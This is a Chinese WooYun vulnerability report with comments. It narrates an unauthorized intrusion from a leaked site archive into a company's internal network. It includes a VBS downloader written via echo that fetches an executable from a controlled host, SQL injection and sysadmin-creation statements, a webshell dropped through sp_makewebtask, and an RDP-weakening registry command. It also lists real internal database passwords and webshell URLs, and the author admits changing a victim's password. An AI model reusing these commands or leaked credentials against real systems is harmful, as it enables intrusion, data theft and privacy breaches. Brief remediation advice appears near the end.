从bin.rar到京华时报内网

首先从http://shop.yijia360.com:81/bin.rar 找到一个压缩包

解压之后是asp.net 网站的dll文件，

我用ILSpy反编译一下，发现这个是经典的.net mvc架构，而且Model层用了比较新的linq to sql，也就是说，如果程序员不是特别傻逼的话，Sql注入是没戏了，然后我逆向了两个星期，证明了一件事，就是这个程序员是挺有经验的人……，但是，既然给源代码了，就一定能找到漏洞！！！！！主要反编译的文件是ERP_Web.dll

这个文件是control层的代码

后来我展开ERP_Web节点的left代码的时候发现有戏：

我跟踪Context.GetCookie这个函数

发现：

再跟进：Decrypt()

这整个过程就很清晰了：用户登陆之后把用户Id做Des加密保存到Cookie里面，用户请求页面的时候再把Cookie的加密数据解密，然后从数据库里面查询用户的是否存在，权限是什么

下面我们寻找一下密钥：

发现程序员把密钥写死在代码里面了：

在KeyCryp类里面：

而且我在这个地址发现可以不用登陆就可以得到管理员的Id：

http://shop.yijia360.com:81/role/SearchAdmin.aspx

我写了一个还原的程序：

运行之后：

在浏览器里面：

然后访问：http://223.71.241.126:81/index.html

进到后台了，在产品设置->产品管理->编辑 发现

产品图片上传：

传个木马上去

Ok

http://223.71.241.126:81/Images/Product/2799/bigPicdbcd07db-a0e4-4431-afd4-ee358d9ade1b.aspx

缺陷对应的源代码在：

好了，拿到Shell之后后面就都是老司机的套路了

首先发现这个服务器没有打系统补丁，然后用ms51-051秒掉

加个用户用kali+reGeorgSocksProxy.py+proxychains+rdesktop就上到服务器的远程桌面了：（中间有个小的技术点就是：如果你这样直接链接上去的话，rdesktop会报错：Failed to connect, CredSSP required by server 原因是windows系统的远程登陆启用了仅允许运行使用网络级别身份验证的远程桌面的计算机连接，我要改成：允许运行任意版本的远程桌面的计算机连接：

在WebShell里面这样操作：reg add "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

）

扫了个端口：

发现：10.8.1.99和10.8.1.101开了Ftp

其中10.8.1.99的ftp用户名和密码都是admin

发现个压缩包：物流水.发行.老超市（含内外网）.zip 下载下来

发现里面有个配置文件：

发现10.8.1.1的数据库密码，然后发现这个账号的是sysadmin的权限，而且数据库的服务器权限是System，这样的后果是，服务器沦陷：

发现服务器上还插了个U盘，里面的是大量的企业机密和个人隐私：

在10.8.1.101的Ftp里面发现：（ftp的用户名密码都是：public）

这些系统都下载下来之后就发现配置文件里面有各个系统的数据库密码：

server=10.8.1.2;UID=FaXingAdmin;PWD=FaXingAdmin*!%$_365;database=master;Provider=SQLOLEDB public

server=10.8.1.40;UID=u_zichan;;database=master;Provider=SQLOLEDB sa

server=10.8.1.1;UID=sa;PWD=jhsb_fxzx_jsz;database=master;Provider=SQLOLEDB sa

server=10.8.1.36;database=JHERP;uid=JHERP;password=liuhkjf(*IUGIUJ579 public

server=10.8.1.4;UID=db_shop;PWD=dbshopdbshopdbshop_123;database=master;Provider=SQLOLEDB public

user id=sa;password=JHfx_!>%_54213;data source=10.8.1.5;persist security info=False;initial catalog=Retail_Web

我发现10.8.1.40这个数据库虽然是sysadmin的用户但是服务器的权限不高，但是这个服务器也没有打补丁，就开了1433端口，所以我把ms15-051放入我控制的10.8.1.36的网站根目录底下，然后用echo 写的方式写了一个vb的下载者木马：

echo iLocal = LCase(WScript.Arguments(1)) >c://iget.vbs

echo iRemote = LCase(WScript.Arguments(0)) >>c://iget.vbs

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>c://iget.vbs

echo xPost.Open "GET",iRemote,0 >>c://iget.vbs

echo xPost.Send() >>c://iget.vbs

echo Set sGet = CreateObject("ADODB.Stream") >>c://iget.vbs

echo sGet.Mode = 3 >>c://iget.vbs

echo sGet.Type = 1 >>c://iget.vbs

echo sGet.Open() >>c://iget.vbs

echo sGet.Write(xPost.responseBody) >>c://iget.vbs

echo sGet.SaveToFile iLocal,2 >>c://iget.vbs

用法: cscript c://iget.vbs http:// 10.8.1.36/1.exe c://1.exe

然后用ms51-051提权拿到服务器权限：

在http://10.8.1.5:4242/ 有sql注入：

用’;if IS_SRVROLEMEMBER('sysadmin')=1 waitfor delay '0:0:5'—

检测后面的数据库权限，结果是Sysadmin

然后在数据库里面添加另一个Sysadmin的帐号

创建用户并且赋予sysadmin角色：

EXEC sp_addlogin 'myadmin','myadmin','master'

EXEC sp_addsrvrolemember 'myadmin', 'sysadmin'

然后连接：

因为管理员完全封闭了xp_cmdshell我用xp_dirtree查看目录

EXEC MASTER..XP_dirtree 'c:/',1,1

找到网站的目录：

D:/WEB/bjtissue.com.cn/Pl_Manage/

利用数据库的一个写文件的存储过程写个shell

sp_makewebtask @outputfile='d:/WEB/bjtissue.com.cn/Pl_Manage/bin.aspx',@charset=utf8,@query='select ''<%@ Page Language="Jscript"%><%eval(Request.Item["a"],"unsafe");%>'''

用菜刀连接之后拿到shell

在：http://www.bjtissue.com.cn:42424/x.aspx

因为还有很多事情要忙，所以渗透就到这里

如上都有

对了，你们那台10.8.1.36的服务器用户sqladmin的密码被我不小心改成Admin#123了，真是特别抱歉

代码层面用Session代替cookie，文件上传要验证后缀

运维方面，请把网站的压缩包从站点目录删除：

包括：http://shop.yijia360.com/web.zip

http://shop.yijia360.com/bin.rar

http://shop.yijia360.com:81/bin.rar

http://shop.yijia360.com:81/bin.rar

http://shop.yijia360.com:81/order.rar

请删掉

关闭目录遍历

内网ftp密码设置复杂一点

请将我的木马删除：

http://223.71.241.126:81/Images/Product/2799/bigPicdbcd07db-a0e4-4431-afd4-ee358d9ade1b.aspx

http://223.71.241.126:81/Images/Product/2799/bigPice64d9e07-5c8f-4337-aef6-8634e0be3c32.cer

http://www.bjtissue.com.cn:42424/x.aspx

http://www.bjtissue.com.cn:42424/bin.asp

http://www.bjtissue.com.cn:42424/bin1.asp

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-05-27 13:30

厂商回复：

漏洞Rank：15 (WooYun评价)

最新状态：

暂无

1. 2016-05-21 11:27 | 0h1in9e ( 实习白帽子 | Rank:68 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

   0

   从进入内网到喝茶

   1# 回复此人

2. 2016-05-21 12:16 | 水系cmos ( 实习白帽子 | Rank:47 漏洞数:7 | _(:з」✿)_)

   0

   这个逼我是要给666的

   2# 回复此人

3. 2016-05-21 12:44 | niexinming ( 普通白帽子 | Rank:318 漏洞数:53 | 好好学习，天天日站)

   0

   @水系cmos 888888888

   3# 回复此人

4. 2016-05-22 12:58 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

   0

   bin.rar 进入内网.感觉好神奇的

   4# 回复此人

5. 2016-05-22 14:00 | niexinming ( 普通白帽子 | Rank:318 漏洞数:53 | 好好学习，天天日站)

   0

   @带我玩 一点点审计的，我准备考完试在drops发个文章：如何审计.net 网站

   5# 回复此人

6. 2016-05-22 15:20 | Soulmk ( 实习白帽子 | Rank:58 漏洞数:18 | 好好学习才是正事~)

   0

   @niexinming 支持！期待你的文章~

   6# 回复此人

7. 2016-05-22 20:21 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

   0

   @niexinming 支持

   7# 回复此人

8. 2016-05-22 20:44 | feiyu ( 普通白帽子 | Rank:114 漏洞数:31 )

   0

   @niexinming 期待

   8# 回复此人

9. 2016-05-22 23:47 | niexinming ( 普通白帽子 | Rank:318 漏洞数:53 | 好好学习，天天日站)

   1

   @Soulmk @带我玩 @feiyu 谢谢大家

   9# 回复此人

10. 2016-05-27 13:33 | Dracul ( 路人 | Rank:17 漏洞数:8 | ⊙_⊙)

    0

    强

    10# 回复此人

11. 2016-05-27 15:20 | n1Ce ( 路人 | Rank:2 漏洞数:1 | 面基品茶撸啊撸)

    0

    我还是个宝宝，无影响厂商忽略

    11# 回复此人

12. 2016-05-27 20:58 | 菜鸟小Q ( 普通白帽子 | Rank:205 漏洞数:56 | 坚定自己的信仰并一直做下去......)

    0

    太牛了，老司机

    12# 回复此人

13. 2016-05-28 15:07 | 牛奶鸡蛋 ( 路人 | Rank:8 漏洞数:2 | 日战好难，有偿拜师)

    0

    从bin.rar到查水表

    13# 回复此人

14. 2016-05-28 16:05 | 酷帥王子 ( 普通白帽子 | Rank:270 漏洞数:74 | 天之屌，人之神！天人合一，乃屌神也！绝对...)

    0

    看了这篇文章才知道强中自有强中手，自愧不如啊，也许有时间并不是玩的时间久就代表技术好，看来还是要学的全面一些，看看这个逆向，再看看,s15-051提权，啧啧！楼主屌

    14# 回复此人

15. 2016-05-28 16:29 | 郁闷的小白 ( 路人 | Rank:2 漏洞数:3 | 小白一个)

    0

    @niexinming 太牛了 求带

    15# 回复此人

16. 2016-05-30 00:26 | niexinming ( 普通白帽子 | Rank:318 漏洞数:53 | 好好学习，天天日站)

    0

    @酷帥王子 大牛谦虚了

    16# 回复此人

17. 2016-05-30 11:39 | Drizzle.Risk ( 普通白帽子 | Rank:265 漏洞数:20 | 放下屠刀，立地成蛤)

    0

    主要太花时间

    17# 回复此人